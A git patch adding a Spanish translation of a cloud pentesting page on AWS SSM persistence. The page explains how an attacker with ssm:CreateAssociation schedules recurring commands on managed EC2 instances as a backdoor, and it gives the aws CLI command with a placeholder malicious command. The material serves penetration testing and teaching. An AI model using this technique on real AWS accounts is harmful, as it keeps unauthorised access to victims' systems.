From 266a1115bac92f938b3e5a4122cc93e2236c5685 Mon Sep 17 00:00:00 2001 From: Translator Date: Thu, 24 Jul 2025 06:50:21 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-p --- .../aws-persistence/aws-ssm-perssitence.md | 28 ++++++++++++++++++- 1 file changed, 27 insertions(+), 1 deletion(-) diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md index 698de9a73..e2645e322 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md @@ -1 +1,27 @@ -# AWS - SSM Persistencia +# AWS - SSM Perssitence + +{{#include ../../../banners/hacktricks-training.md}} + +## SSM + +Para más información, consulta: + +{{#ref}} +../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md +{{#endref}} + +### Usando ssm:CreateAssociation para persistencia + +Un atacante con el permiso ssm:CreateAssociation puede crear una Asociación de State Manager para ejecutar automáticamente comandos en instancias de EC2 gestionadas por SSM. Estas asociaciones se pueden configurar para ejecutarse a intervalos fijos, lo que las hace adecuadas para una persistencia similar a una puerta trasera sin sesiones interactivas. +```bash +aws ssm create-association \ +--name SSM-Document-Name \ +--targets Key=InstanceIds,Values=target-instance-id \ +--parameters commands=["malicious-command"] \ +--schedule-expression "rate(30 minutes)" \ +--association-name association-name +``` +> [!NOTE] +> Este método de persistencia funciona siempre que la instancia EC2 sea gestionada por Systems Manager, el agente SSM esté en ejecución y el atacante tenga permiso para crear asociaciones. No requiere sesiones interactivas ni permisos explícitos de ssm:SendCommand. **Importante:** El parámetro `--schedule-expression` (por ejemplo, `rate(30 minutes)`) debe respetar el intervalo mínimo de 30 minutos de AWS. Para ejecución inmediata o única, omita `--schedule-expression` por completo: la asociación se ejecutará una vez después de la creación. + +{{#include ../../../banners/hacktricks-training.md}}